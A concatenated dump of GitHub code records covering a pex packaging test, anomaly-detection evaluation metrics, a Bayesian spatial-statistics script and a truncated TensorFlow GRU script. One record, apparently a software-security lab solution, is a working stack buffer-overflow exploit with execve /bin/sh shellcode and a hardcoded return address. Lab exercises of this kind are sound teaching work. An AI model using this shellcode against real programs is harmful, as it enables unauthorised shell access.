assert_pex_args_shebang('#!/usr/bin/python')\n\n\ndef test_unwriteable_contents():\n my_app_setup_py = dedent(\"\"\"\n from setuptools import setup\n\n setup(\n name='my_app',\n version='0.0.0',\n zip_safe=True,\n packages=['my_app'],\n include_package_data=True,\n package_data={'my_app': ['unwriteable.so']},\n )\n \"\"\")\n\n UNWRITEABLE_PERMS = 0o400\n with temporary_content({'setup.py': my_app_setup_py,\n 'my_app/__init__.py': '',\n 'my_app/unwriteable.so': ''},\n perms=UNWRITEABLE_PERMS) as my_app_project_dir:\n with pushd(my_app_project_dir):\n subprocess.check_call([sys.executable, 'setup.py', 'bdist_wheel'])\n\n uses_my_app_setup_py = dedent(\"\"\"\n from setuptools import setup\n\n setup(\n name='uses_my_app',\n version='0.0.0',\n zip_safe=True,\n install_requires=['my_app'],\n )\n \"\"\")\n with temporary_content({'setup.py': uses_my_app_setup_py}) as uses_my_app_project_dir:\n with pushd(uses_my_app_project_dir):\n subprocess.check_call([sys.executable,\n 'setup.py',\n 'bdist_pex',\n '--pex-args=--disable-cache --no-pypi -f {}'\n .format(os.path.join(my_app_project_dir, 'dist'))])\n\n with open_zip('dist/uses_my_app-0.0.0.pex') as zf:\n unwriteable_sos = [path for path in zf.namelist()\n if path.endswith('my_app/unwriteable.so')]\n assert 1 == len(unwriteable_sos)\n unwriteable_so = unwriteable_sos.pop()\n zf.extract(unwriteable_so)\n assert UNWRITEABLE_PERMS == stat.S_IMODE(os.stat(unwriteable_so).st_mode)\n","repo_name":"peterdemin/pex","sub_path":"tests/test_bdist_pex.py","file_name":"test_bdist_pex.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"6680059267","text":"import numpy as np\nimport scipy.io as scio\nimport os\nimport argparse\nimport pickle\nfrom sklearn import metrics\nimport json\nimport socket\nimport matplotlib.pyplot as plt\n\n# config\nDATA_DIR = '/p300/dataset' # const.data_dir_gt, dataset_root_dir\n\n#\nNORMALIZE = True \nnum_his = 4 \nDECIDABLE_IDX = num_his\n\n\nclass RecordResult(object):\n def __init__(self, fpr=None, tpr=None, auc=-np.inf, dataset=None, loss_file=None, lam_rgb_fea_comm=None, lam_smooth=None):\n self.fpr = fpr\n self.tpr = tpr\n 
self.auc = auc\n self.dataset = dataset\n self.loss_file = loss_file\n self.lam_rgb_fea_comm = lam_rgb_fea_comm\n self.lam_smooth = lam_smooth\n\n def __lt__(self, other):\n return self.auc < other.auc\n\n def __gt__(self, other):\n return self.auc > other.auc\n\n def __str__(self):\n return 'dataset = {}, loss file = {}, auc = {}, lam_rgb_fea_comm={}, ' \\\n 'lam_smooth={}'.format(self.dataset, self.loss_file, self.auc, self.lam_rgb_fea_comm, self.lam_smooth)\n\n\nclass GroundTruthLoader(object):\n AVENUE = 'avenue'\n PED1 = 'ped1'\n PED1_PIXEL_SUBSET = 'ped1_pixel_subset'\n PED2 = 'ped2'\n ENTRANCE = 'enter'\n EXIT = 'exit'\n SHANGHAITECH = 'shanghaitech'\n SHANGHAITECH_LABEL_PATH = os.path.join(DATA_DIR, 'shanghaitech/testing/test_frame_mask')\n TOY_DATA = 'toydata'\n TOY_DATA_LABEL_PATH = os.path.join(DATA_DIR, TOY_DATA, 'toydata.json')\n\n NAME_MAT_MAPPING = {\n AVENUE: os.path.join(DATA_DIR, 'avenue/avenue.mat'),\n PED1: os.path.join(DATA_DIR, 'ped1/ped1.mat'),\n PED2: os.path.join(DATA_DIR, 'ped2/ped2.mat'),\n ENTRANCE: os.path.join(DATA_DIR, 'enter/enter.mat'),\n EXIT: os.path.join(DATA_DIR, 'exit/exit.mat')\n }\n\n NAME_FRAMES_MAPPING = {\n AVENUE: os.path.join(DATA_DIR, 'avenue/testing/frames'),\n PED1: os.path.join(DATA_DIR, 'ped1/testing/frames'),\n PED2: os.path.join(DATA_DIR, 'ped2/testing/frames'),\n ENTRANCE: os.path.join(DATA_DIR, 'enter/testing/frames'),\n EXIT: os.path.join(DATA_DIR, 'exit/testing/frames')\n }\n\n def __init__(self, mapping_json=None):\n \"\"\"\n Initial a ground truth loader, which loads the ground truth with given dataset name.\n\n :param mapping_json: the mapping from dataset name to the path of ground truth.\n \"\"\"\n\n if mapping_json is not None:\n with open(mapping_json, 'rb') as json_file:\n self.mapping = json.load(json_file)\n else:\n self.mapping = GroundTruthLoader.NAME_MAT_MAPPING\n\n def __call__(self, dataset):\n \"\"\" get the ground truth by provided the name of dataset.\n\n :type dataset: str\n :param dataset: the name of dataset.\n :return: np.ndarray, shape(#video)\n np.array[0] contains all the start frame and end frame of abnormal events of video 0,\n and its shape is (#frapsnr, )\n \"\"\"\n\n if dataset == GroundTruthLoader.SHANGHAITECH:\n gt = self.__load_shanghaitech_gt()\n elif dataset == GroundTruthLoader.TOY_DATA:\n gt = self.__load_toydata_gt()\n else:\n gt = self.__load_ucsd_avenue_subway_gt(dataset)\n return gt\n\n def __load_ucsd_avenue_subway_gt(self, dataset):\n assert dataset in self.mapping, 'there is no dataset named {} \\n Please check {}' \\\n .format(dataset, GroundTruthLoader.NAME_MAT_MAPPING.keys())\n\n mat_file = self.mapping[dataset]\n abnormal_events = scio.loadmat(mat_file, squeeze_me=True)['gt']\n\n if abnormal_events.ndim == 2:\n abnormal_events = abnormal_events.reshape(-1, abnormal_events.shape[0], abnormal_events.shape[1])\n\n num_video = abnormal_events.shape[0]\n dataset_video_folder = GroundTruthLoader.NAME_FRAMES_MAPPING[dataset]\n video_list = os.listdir(dataset_video_folder)\n video_list.sort()\n\n assert num_video == len(video_list), 'ground true does not match the number of testing videos. 
{} != {}' \\\n .format(num_video, len(video_list))\n\n # get the total frames of sub video\n def get_video_length(sub_video_number):\n # video_name = video_name_template.format(sub_video_number)\n video_name = os.path.join(dataset_video_folder, video_list[sub_video_number])\n assert os.path.isdir(video_name), '{} is not directory!'.format(video_name)\n\n length = len(os.listdir(video_name))\n\n return length\n\n # need to test [].append, or np.array().append(), which one is faster\n gt = []\n for i in range(num_video):\n length = get_video_length(i)\n\n sub_video_gt = np.zeros((length,), dtype=np.int8)\n sub_abnormal_events = abnormal_events[i]\n if sub_abnormal_events.ndim == 1:\n sub_abnormal_events = sub_abnormal_events.reshape((sub_abnormal_events.shape[0], -1))\n\n _, num_abnormal = sub_abnormal_events.shape\n\n for j in range(num_abnormal):\n # (start - 1, end - 1)\n start = sub_abnormal_events[0, j] - 1\n end = sub_abnormal_events[1, j]\n\n sub_video_gt[start: end] = 1\n\n gt.append(sub_video_gt)\n\n return gt\n\n @staticmethod\n def __load_shanghaitech_gt():\n video_path_list = os.listdir(GroundTruthLoader.SHANGHAITECH_LABEL_PATH)\n video_path_list.sort()\n\n gt = []\n for video in video_path_list:\n # print(os.path.join(GroundTruthLoader.SHANGHAITECH_LABEL_PATH, video))\n gt.append(np.load(os.path.join(GroundTruthLoader.SHANGHAITECH_LABEL_PATH, video)))\n\n return gt\n\n @staticmethod\n def __load_toydata_gt():\n with open(GroundTruthLoader.TOY_DATA_LABEL_PATH, 'r') as gt_file:\n gt_dict = json.load(gt_file)\n\n gt = []\n for video, video_info in gt_dict.items():\n length = video_info['length']\n video_gt = np.zeros((length,), dtype=np.uint8)\n sub_gt = np.array(np.matrix(video_info['gt']))\n\n for anomaly in sub_gt:\n start = anomaly[0]\n end = anomaly[1] + 1\n video_gt[start: end] = 1\n gt.append(video_gt)\n return gt\n\n @staticmethod\n def get_pixel_masks_file_list(dataset):\n # pixel mask folder\n pixel_mask_folder = os.path.join(DATA_DIR, dataset, 'pixel_masks')\n pixel_mask_file_list = os.listdir(pixel_mask_folder)\n pixel_mask_file_list.sort()\n\n # get all testing videos\n dataset_video_folder = GroundTruthLoader.NAME_FRAMES_MAPPING[dataset]\n video_list = os.listdir(dataset_video_folder)\n video_list.sort()\n\n # get all testing video names with pixel masks\n pixel_video_ids = []\n ids = 0\n for pixel_mask_name in pixel_mask_file_list:\n while ids < len(video_list):\n if video_list[ids] + '.npy' == pixel_mask_name:\n pixel_video_ids.append(ids)\n ids += 1\n break\n else:\n ids += 1\n\n assert len(pixel_video_ids) == len(pixel_mask_file_list)\n\n for i in range(len(pixel_mask_file_list)):\n pixel_mask_file_list[i] = os.path.join(pixel_mask_folder, pixel_mask_file_list[i])\n\n return pixel_mask_file_list, pixel_video_ids\n\n\ndef load_psnr(loss_file):\n \"\"\"\n load image psnr or optical flow psnr.\n :param loss_file: loss file path\n :return:\n \"\"\"\n with open(loss_file, 'rb') as reader:\n # results {\n # 'dataset': the name of dataset\n # 'psnr': the psnr of each testing videos,\n # }\n\n # psnr_records['psnr'] is np.array, shape(#videos)\n # psnr_records[0] is np.array ------> 01.avi\n # psnr_records[1] is np.array ------> 02.avi\n # ......\n # psnr_records[n] is np.array ------> xx.avi\n\n results = pickle.load(reader)\n psnrs = results['psnr']\n return psnrs\n\n\ndef load_psnr_gt(loss_file):\n try:\n with open(loss_file, 'rb') as reader:\n results = pickle.load(reader)\n # results {\n # 'dataset': the name of dataset\n # 'psnr': the psnr of each testing videos,\n 
# }\n\n # psnr_records['psnr'] is np.array, shape(#videos)\n # psnr_records[0] is np.array ------> 01.avi\n # psnr_records[1] is np.array ------> 02.avi\n # ......\n # psnr_records[n] is np.array ------> xx.avi\n\n dataset = results['dataset']\n psnr_records = results['psnr']\n\n num_videos = len(psnr_records)\n\n # load ground truth\n gt_loader = GroundTruthLoader()\n gt = gt_loader(dataset=dataset)\n\n assert num_videos == len(gt), 'the number of saved videos does not match the ground truth, {} != {}' \\\n .format(num_videos, len(gt))\n\n return dataset, psnr_records, gt\n except EOFError:\n return None, None, None\n\n\ndef get_scores_labels(loss_file):\n # the name of dataset, loss, and ground truth\n dataset, psnr_records, gt = load_psnr_gt(loss_file=loss_file)\n\n # the number of videos\n num_videos = len(psnr_records)\n\n scores = np.array([], dtype=np.float32)\n labels = np.array([], dtype=np.int8)\n # video normalization\n for i in range(num_videos):\n distance = psnr_records[i]\n\n if NORMALIZE:\n distance -= distance.min() # distances = (distance - min) / (max - min)\n distance /= distance.max()\n # distance = 1 - distance\n\n scores = np.concatenate((scores[:], distance[DECIDABLE_IDX:]), axis=0)\n labels = np.concatenate((labels[:], gt[i][DECIDABLE_IDX:]), axis=0)\n return dataset, scores, labels\n\n\ndef precision_recall_auc(loss_file):\n if not os.path.isdir(loss_file):\n loss_file_list = [loss_file]\n else:\n loss_file_list = os.listdir(loss_file)\n loss_file_list = [os.path.join(loss_file, sub_loss_file) for sub_loss_file in loss_file_list]\n\n optimal_results = RecordResult()\n for sub_loss_file in loss_file_list:\n dataset, scores, labels = get_scores_labels(sub_loss_file)\n precision, recall, thresholds = metrics.precision_recall_curve(labels, scores, pos_label=0)\n auc = metrics.auc(recall, precision)\n\n results = RecordResult(recall, precision, auc, dataset, sub_loss_file)\n\n if optimal_results < results:\n optimal_results = results\n\n if os.path.isdir(loss_file):\n print(results)\n print('##### optimal result and model = {}'.format(optimal_results))\n return optimal_results\n\n\ndef cal_eer(fpr, tpr):\n # makes fpr + tpr = 1\n eer = fpr[np.nanargmin(np.absolute((fpr + tpr - 1)))]\n return eer\n\n\ndef compute_eer(loss_file):\n if not os.path.isdir(loss_file):\n loss_file_list = [loss_file]\n else:\n loss_file_list = os.listdir(loss_file)\n loss_file_list = [os.path.join(loss_file, sub_loss_file) for sub_loss_file in loss_file_list]\n\n optimal_results = RecordResult(auc=np.inf)\n for sub_loss_file in loss_file_list:\n dataset, scores, labels = get_scores_labels(sub_loss_file)\n fpr, tpr, thresholds = metrics.roc_curve(labels, scores, pos_label=0)\n eer = cal_eer(fpr, tpr)\n\n results = RecordResult(fpr, tpr, eer, dataset, sub_loss_file)\n\n if optimal_results > results:\n optimal_results = results\n\n if os.path.isdir(loss_file):\n print(results)\n return optimal_results\n\n\ndef load_img_pred_fea_comm_gt(loss_file):\n try:\n with open(loss_file, 'rb') as reader:\n results = pickle.load(reader)\n # results {\n # 'dataset': the name of dataset\n # 'psnr': the psnr of each testing videos,\n # }\n\n # psnr_records['psnr'] is np.array, shape(#videos)\n # psnr_records[0] is np.array ------> 01.avi\n # psnr_records[1] is np.array ------> 02.avi\n # ......\n # psnr_records[n] is np.array ------> xx.avi\n\n dataset = results['dataset']\n\n rgb_img_pred_records = results['rgb_img_pred_records']\n rgb_fea_comm_records = results['rgb_fea_comm_records']\n op_img_pred_records = 
results['op_img_pred_records']\n            op_fea_comm_records = results['op_fea_comm_records']\n\n            num_videos = len(rgb_img_pred_records)\n\n            # load ground truth\n            gt_loader = GroundTruthLoader()\n            gt = gt_loader(dataset=dataset)\n\n            assert num_videos == len(gt), 'the number of saved videos does not match the ground truth, {} != {}' \\\n                .format(num_videos, len(gt))\n\n            return dataset, rgb_img_pred_records, rgb_fea_comm_records, \\\n                   op_img_pred_records, op_fea_comm_records, gt\n\n    except EOFError:\n        # callers unpack six values, so return six Nones on a truncated file\n        return None, None, None, None, None, None\n\n\ndef img_pred_fea_comm_single_auc(loss_file, lam=(0.5,0.5)):\n\n    if not os.path.isdir(loss_file):\n        loss_file_list = [loss_file]\n    else:\n        loss_file_list = os.listdir(loss_file)\n        loss_file_list = [os.path.join(loss_file, sub_loss_file)\n                          for sub_loss_file in loss_file_list]\n    optimal_results = RecordResult() \n\n    for sub_loss_file in loss_file_list:\n        dataset, rgb_img_pred_records, rgb_fea_comm_records, \\\n        op_img_pred_records, op_fea_comm_records, gt = load_img_pred_fea_comm_gt(loss_file=sub_loss_file)\n\n        if dataset is None:\n            continue \n\n        num_videos = len(rgb_img_pred_records)\n\n        labels = np.array([], dtype=np.int8)\n        for i in range(num_videos):\n            labels = np.concatenate((labels, gt[i][DECIDABLE_IDX:]), axis=0)\n        \n        def norm_score(num_videos, records):\n            scores = np.array([], dtype=np.float32)\n            for i in range(num_videos):\n                distance = records[i] # a sub_video loss_record\n                if NORMALIZE:\n                    distance -= distance.min() # distances = (distance - min) / (max - min)\n                    distance /= distance.max()\n                scores = np.concatenate((scores, distance[DECIDABLE_IDX:]), axis=0)\n            if NORMALIZE: # whole video normalize\n                scores -= scores.min() # scores = (scores - min) / (max - min)\n                scores /= scores.max()\n\n            return scores\n        img_scores = norm_score(num_videos, rgb_img_pred_records) \n        fea_scores = norm_score(num_videos, rgb_fea_comm_records) \n        identity = np.ones_like(fea_scores)\n        #\n        lam_rgb_fea_comm_list = [x * 0.01 for x in range(0, 100)]\n        lam_smooth_list = [x * 0.05 for x in range(0, 20)]\n\n        lam_rgb_fea_comm, lam_smooth = lam[0], lam[1]\n        scores = (1-lam_rgb_fea_comm) * img_scores + lam_rgb_fea_comm * (identity - fea_scores)\n        scores = [(1-lam_smooth)*scores[idx-1]+lam_smooth*scores[idx] if idx>0 else scores[idx] for idx in range(len(scores))]\n        fpr, tpr, thresholds = metrics.roc_curve(labels, scores, pos_label=0)\n        auc = metrics.auc(fpr, tpr)\n        results = RecordResult(fpr, tpr, auc, dataset, sub_loss_file, lam_rgb_fea_comm, lam_smooth)\n        \n        if optimal_results < results:\n            optimal_results = results\n    \n    ret_dict = {}\n    ret_dict[\"optimal_loss\"] = \"{}\".format(optimal_results.loss_file)\n    ret_dict[\"auc\"] = round(optimal_results.auc,3)\n    \n    return ret_dict\n\n\neval_type_function = {\n    'compute_eer': compute_eer,\n    'precision_recall_auc': precision_recall_auc,\n    'img_pred_fea_comm_rgb_auc': img_pred_fea_comm_single_auc,\n}\n\n\ndef evaluate(eval_type, save_file, lam=None):\n    assert eval_type in eval_type_function, 'there is no type of evaluation {}, please check {}' \\\n        .format(eval_type, eval_type_function.keys())\n    eval_func = eval_type_function[eval_type]\n    # compute_eer and precision_recall_auc accept a single argument,\n    # so only forward lam when it was actually supplied\n    if lam is None:\n        optimal_results = eval_func(save_file)\n    else:\n        optimal_results = eval_func(save_file, lam)\n    return optimal_results\n","repo_name":"NjuHaoZhang/AMMCNet_AAAI2021","sub_path":"Code/main/eval_metric.py","file_name":"eval_metric.py","file_ext":"py","file_size_in_byte":16175,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"48"} +{"seq_id":"72296658707","text":"#!/usr/bin/python3\nimport sys\nimport subprocess\n\npath = 
'/home/kribas/Software-Security-Lab/bof-exercise-2/bof4'\ninfile = f'{path}/input2.txt'\nvuln = f'{path}/bof4'\n\n\nXOR_EAX_EAX= b'\\x31\\xc0' #2b\nXOR_EDX_EDX = b\"\\x31\\xd2\" #2b\nPUSH_EAX = b\"\\x50\" #1b\nPUSH_ARG_1 = b\"\\x68\\x2f\\x2f\\x73\\x68\" #5b\nPUSH_ARG_2 = b\"\\x68\\x2f\\x62\\x69\\x6e\" #5b\nMOV_EBX_ESP = b\"\\x89\\xe3\" #2b\nMOV_AL_0B = b\"\\xb0\\x0b\" #2b\nINT_80H = b\"\\xcd\\x80\" #2b\n\nSHELLCODE = XOR_EAX_EAX+\\\n XOR_EDX_EDX+\\\n PUSH_EAX+\\\n PUSH_ARG_1+\\\n PUSH_ARG_2+\\\n MOV_EBX_ESP+\\\n MOV_AL_0B+\\\n INT_80H\n\n\nbuff_len = 0x18\nwin_addr = b'\\x80\\xd3\\xff\\xff'\nbuffer = b'A'*buff_len +b'BBBB' + win_addr + SHELLCODE\n\nwith open(infile,'wb') as f:\n\tf.write(buffer)\n\tf.close()\n\nwith open(infile,'rb') as f:\n\tprog = subprocess.run(['/home/kribas/Software-Security-Lab/bof-exercise-2/bof4/bof4'],stdout=subprocess.PIPE,stdin=f)\n\tprint(prog.stdout)\n\tsys.stdout.buffer.write(prog.stdout)\n\tf.close()\n","repo_name":"Kr1bas/writeups","sub_path":"Software-Security-Lab/bof-exercise-2/bof4/solve2.py","file_name":"solve2.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43060165480","text":"import csv\nfrom pyBayes.MCMC_Core import MCMC_Diag\nfrom spatial_util.cov_functions import Matern\nfrom spatial_util.least_squares import sym_defpos_matrix_inversion_cholesky\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\npart2_inst = MCMC_Diag()\npart2_MC_sample = []\nwith open(\"hw4_fullbayes_samples_t1.csv\", newline='') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in csv_reader:\n part2_MC_sample.append([float(x) for x in row])\nwith open(\"hw4_fullbayes_samples_t2.csv\", newline='') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in csv_reader:\n part2_MC_sample.append([float(x) for x in row])\npart2_inst.set_mc_samples_from_list(part2_MC_sample)\npart2_inst.burnin(100)\n# 0 1 2 3 4 5 6 7 8 9 10 11\npart2_inst.set_variable_names([\"beta0\", \"beta1\", \"beta2\", \"beta3\", \"beta4\", \"beta5\", \"sigma2_T\", \"theta\", \"phi\", \"v\", \"sigma2_S\", \"tau2\"])\n# part2_inst.show_traceplot((6,2))\n# part2_inst.show_hist((6,2))\n# part2_inst.show_acf(30, (6,2))\n# part2_inst.print_summaries(4, latex_table_format=True)\n\n\n# Data loading and plotting\ndata_soil_carbon = []\ndata_soil_carbon_sd = []\ndata_landuse_str = []\ndata_long_x = []\ndata_lat_y = []\n\ndata_path = ['data/soil_carbon_MD.csv', 'data/soil_carbon_NJ.csv', 'data/soil_carbon_DE.csv', 'data/soil_carbon_PA.csv']\nfor path in data_path:\n with open(path, newline='') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n next(csv_reader)\n # 0 ,1 ,2 ,3 ,4 ,5 ,6 ,7 ,8 ,9 ,10 ,11 ,12\n # \"\",\"sample_id\",\"rcapid\",\"soc\",\"soc_sd\",\"soc_measured\",\"sample_top\",\"sample_bottom\",\"texture\",\"elevation\",\"long\",\"lat\",\"landuse\"\n for row in csv_reader:\n # print(row)\n data_soil_carbon.append(float(row[3]))\n data_soil_carbon_sd.append(float(row[4]))\n data_long_x.append(float(row[10]))\n data_lat_y.append(float(row[11]))\n data_landuse_str.append(str(row[12])[1])\n# landuse_switcher = {'F':0, 'W':1, 'P':2, 'X':3}\n\ndata_pts = [(x,y) for x ,y in zip(data_long_x, data_lat_y)]\nlanduse_switcher_to_indicators = {'F':[0,0,0], 'W':[1,0,0], 'P':[0,1,0], 'X':[0,0,1]}\ndesign_mat_degree1_D1l = np.array([[1, x, y] + landuse_switcher_to_indicators[z] for x,y,z in zip(data_long_x, data_lat_y, 
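# landuse level 'F' maps to the all-zero indicator vector, so it is the baseline category of this design matrix\n                                              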
data_landuse_str)])\n\n# ============================================================\nplt_cm = plt.cm.get_cmap('RdYlBu')\nfig_post_pred, axs_post_pred = plt.subplots(1, 3, figsize=(15, 5))\nfig_post_pred.tight_layout()\naxs_post_pred0 = axs_post_pred[0].scatter(data_long_x, data_lat_y, c=data_soil_carbon, vmin=0, vmax=55)\naxs_post_pred[0].set_title(\"soil carbon\")\nfor i, txt in enumerate(data_landuse_str):\n    axs_post_pred[0].annotate(txt, (data_long_x[i], data_lat_y[i]))\naxs_post_pred0_handles, axs_post_pred0_labels = axs_post_pred0.legend_elements(prop=\"colors\", alpha=0.6)\naxs_post_pred[0].legend(axs_post_pred0_handles, axs_post_pred0_labels)\n\n\n\n# ============================================================\n# post_predictive dist on observed point\n# # 0 1 2 3 4 5 6 7 8 9 10 11\n# part2_inst.set_variable_names([\"beta0\", \"beta1\", \"beta2\", \"beta3\", \"beta4\", \"beta5\", \"sigma2_T\", \"theta\", \"phi\", \"v\", \"sigma2_S\", \"tau2\"])\n# n_data_pts = len(data_pts)\n# np_random_inst = np.random.default_rng(20230224)\n\n# post_pred_samples_on_obs_pt = []\n# for i, post_sample in enumerate(part2_inst.MC_sample):\n#     if i%20==0 and i>0:\n#         print(\"iteration\", i, \"/ 4000-100\")\n#     # if i==20:\n#     #     break\n    \n#     matern_inst = Matern(post_sample[9], post_sample[10],post_sample[8])\n#     matern_cov_mat = matern_inst.cov_matrix(data_pts) #at data points\n\n#     post_cov_mat = matern_cov_mat + np.diag([post_sample[11] for _ in range(n_data_pts)])\n#     # inv_cov_data_data, _ = sym_defpos_matrix_inversion_cholesky(cov_data_data)\n\n#     beta = np.transpose(np.array(post_sample[0:6]))\n#     post_mean = design_mat_degree1_D1l@beta\n    \n#     pred_sample = np_random_inst.multivariate_normal(post_mean, post_cov_mat)\n#     post_pred_samples_on_obs_pt.append(pred_sample)\n\n# post_pred_inst = MCMC_Diag() #abused, but...\n# post_pred_inst.set_mc_samples_from_list(post_pred_samples_on_obs_pt)\n# post_pred_inst.write_samples('hw4_fullbayes_pred_samples')\n\n# =====================\npost_pred_inst = MCMC_Diag()\npost_pred_inst.set_mc_sample_from_csv('hw4_fullbayes_pred_samples')\n\n\npost_pred_mean = post_pred_inst.get_sample_mean()\npost_pred_var = post_pred_inst.get_sample_var()\npost_pred_quantile95 = post_pred_inst.get_sample_quantile([0.025, 0.975])\npost_pred_covered = []\ncount_covered = 0\nfor i, (soil, quant) in enumerate(zip(data_soil_carbon, post_pred_quantile95)):\n    covered = 'Y' if quant[0] <= soil <= quant[1] else 'N'\n    if covered=='Y':\n        count_covered += 1\n    post_pred_covered.append(covered)\nprint(count_covered)\n\naxs_post_pred1 = axs_post_pred[1].scatter(*zip(*data_pts), c=post_pred_mean, s=50, alpha=0.6, vmin=0, vmax=55)\naxs_post_pred1_handles, axs_post_pred1_labels = axs_post_pred1.legend_elements(prop=\"colors\", alpha=0.6)\naxs_post_pred[1].legend(axs_post_pred1_handles, axs_post_pred1_labels)\naxs_post_pred[1].set_title(\"predicted posterior mean\")\n\naxs_post_pred2 = axs_post_pred[2].scatter(*zip(*data_pts), c=[np.sqrt(x) for x in post_pred_var], s=50, alpha=0.6)\naxs_post_pred2_handles, axs_post_pred2_labels = axs_post_pred2.legend_elements(prop=\"colors\", alpha=0.6)\naxs_post_pred[2].legend(axs_post_pred2_handles, axs_post_pred2_labels)\naxs_post_pred[2].set_title(\"prediction posterior sd\")\nfor i, txt in enumerate(post_pred_covered):\n    axs_post_pred[2].annotate(str(txt), (data_long_x[i], 
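# txt is the 'Y'/'N' 95%-interval coverage flag computed above\n                                   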
data_lat_y[i]))\n\nplt.show()","repo_name":"letsjdosth/SpatialStat","sub_path":"hw4_part5_postpred_on_obs.py","file_name":"hw4_part5_postpred_on_obs.py","file_ext":"py","file_size_in_byte":5981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31295447711","text":"import tensorflow\nimport numpy\nimport os\nimport random\nimport skimage.io\nimport sklearn.preprocessing\nimport time\n\nlog_dir='log/'\nmodel_dir='model/'\nbatch_size=100\nmax_step=60000\nrepeat_times=10\ninit_lr=0.001\ndecay_rate=0.01\ninput_dim=28\nhidden_dim=40\noutput_dim=10\n\n(train_data,train_label),(test_data,test_label)=tensorflow.keras.datasets.mnist.load_data()\nOneHotEncoder=sklearn.preprocessing.OneHotEncoder()\nOneHotEncoder.fit(train_label.reshape(-1,1))\ntrain_label=OneHotEncoder.transform(train_label.reshape(-1,1)).toarray()\ntest_label=OneHotEncoder.transform(test_label.reshape(-1,1)).toarray()\n\nt1=time.time()\n\ntrain_dataset=tensorflow.data.Dataset.from_tensor_slices({'data':train_data, 'label':train_label}).shuffle(train_data.shape[0]).repeat(repeat_times).batch(batch_size).prefetch(buffer_size=batch_size)\n# test_dataset=tensorflow.data.Dataset.from_tensor_slices({'data':test_data, 'label':test_label}).shuffle(test_data.shape[0]).repeat(repeat_times).batch(batch_size)\ntrain_iterator=train_dataset.make_one_shot_iterator()\n# test_iterator=test_dataset.make_one_shot_iterator()\ntrain_next=train_iterator.get_next()\n# test_next=test_iterator.get_next()\n\ndef gru(x,h_old):\n with tensorflow.variable_scope('gru',reuse=tensorflow.AUTO_REUSE):\n rxw=tensorflow.get_variable('rxw',[input_dim,hidden_dim])\n rhw=tensorflow.get_variable('rhw',[hidden_dim,hidden_dim])\n rb=tensorflow.get_variable('rb',hidden_dim)\n rxw_r=tensorflow.matmul(x,rxw)\n rhw_r=tensorflow.matmul(h_old,rhw)\n rz=rxw_r+rhw_r+rb\n r=tensorflow.nn.sigmoid(rz)\n\n uxw=tensorflow.get_variable('uxw',[input_dim,hidden_dim])\n uhw=tensorflow.get_variable('uhw',[hidden_dim,hidden_dim])\n ub=tensorflow.get_variable('ub',hidden_dim)\n uxw_r=tensorflow.matmul(x,uxw)\n uhw_r=tensorflow.matmul(h_old,uhw)\n uz=uxw_r+uhw_r+ub\n u=tensorflow.nn.sigmoid(uz)\n\n txw=tensorflow.get_variable('txw',[input_dim,hidden_dim])\n thw=tensorflow.get_variable('thw',[hidden_dim,hidden_dim])\n tb=tensorflow.get_variable('tb',hidden_dim)\n txw_r=tensorflow.matmul(x,txw)\n thw_r=tensorflow.matmul(r*h_old,thw)\n tz=txw_r+thw_r+tb\n t=tensorflow.nn.tanh(tz)\n\n h_new=(1-u)*h_old+u*t\n return h_new\n\ndef predict(x):\n with tensorflow.variable_scope('predict',reuse=tensorflow.AUTO_REUSE):\n w=tensorflow.get_variable('w',[hidden_dim,output_dim])\n b=tensorflow.get_variable('b',output_dim)\n z=tensorflow.matmul(x,w)+b\n return z\n\ndef process(data):\n init_hide=numpy.zeros([batch_size,hidden_dim]).astype(numpy.float32)\n encode_output=[]\n for i in range(28):\n if i==0:\n output_hide=gru(tensorflow.cast(data['data'][:,i],tensorflow.float32),init_hide)\n encode_output.append(output_hide)\n else:\n output_hide=gru(tensorflow.cast(data['data'][:,i],tensorflow.float32),output_hide)\n encode_output.append(output_hide) \n predict_output=predict(output_hide)\n return predict_output\n\nlen([x.name for x in tensorflow.get_collection(tensorflow.GraphKeys.GLOBAL_VARIABLES)])\n\ninput_data=tensorflow.placeholder(tensorflow.float32,[batch_size,28,28],name='input_data')\ninput_label=tensorflow.placeholder(tensorflow.float32,[batch_size,10],name='input_label')\nglobal_step = tensorflow.get_variable('global_step',initializer=0, 
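# non-trainable counter; AdamOptimizer.minimize advances it via global_step below\n                                    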
trainable=False)\nlearning_rate=tensorflow.train.exponential_decay(init_lr,global_step,max_step,decay_rate)\n\nprocess_result=process(train_next)\n\nloss=tensorflow.losses.softmax_cross_entropy(tensorflow.cast(train_next['label'],tensorflow.float32),process_result)\n\nminimize=tensorflow.train.AdamOptimizer(learning_rate).minimize(loss,global_step=global_step,name='minimize')\n\n# accuracy,_=tensorflow.metrics.accuracy(input_label,tensorflow.nn.softmax(process_result))\naccuracy = tensorflow.reduce_mean(tensorflow.cast(tensorflow.equal(tensorflow.argmax(tensorflow.nn.softmax(process_result), 1), tensorflow.argmax(input_label, 1)), tensorflow.float32))\n\nSaver = tensorflow.train.Saver(max_to_keep=0,filename='gru')\n\nSession=tensorflow.Session()\nif tensorflow.train.latest_checkpoint(model_dir):\n    Saver.restore(Session,tensorflow.train.latest_checkpoint(model_dir))\nelse:\n    Session.run(tensorflow.global_variables_initializer())\n    Session.run(tensorflow.local_variables_initializer())\n\ntensorflow.summary.scalar('loss', loss)\ntensorflow.summary.scalar('accuracy', accuracy)\nmerge_all = tensorflow.summary.merge_all()\nFileWriter = tensorflow.summary.FileWriter(log_dir, Session.graph)\n\nfor i in range(max_step*repeat_times//batch_size):\n    # temp_train=Session.run(train_next)\n    # Session.run(minimize,feed_dict={input_data:temp_train['data'],input_label:temp_train['label']})\n    Session.run(minimize)\n    # if Session.run(global_step)%100==1:\n    #     temp_test=Session.run(test_next)\n    #     summary = Session.run(merge_all, feed_dict={input_data:temp_test['data'],input_label:temp_test['label']})\n    #     FileWriter.add_summary(summary, Session.run(global_step))\n    #     Saver.save(Session, model_dir, global_step)\n    #     print(Session.run(accuracy, 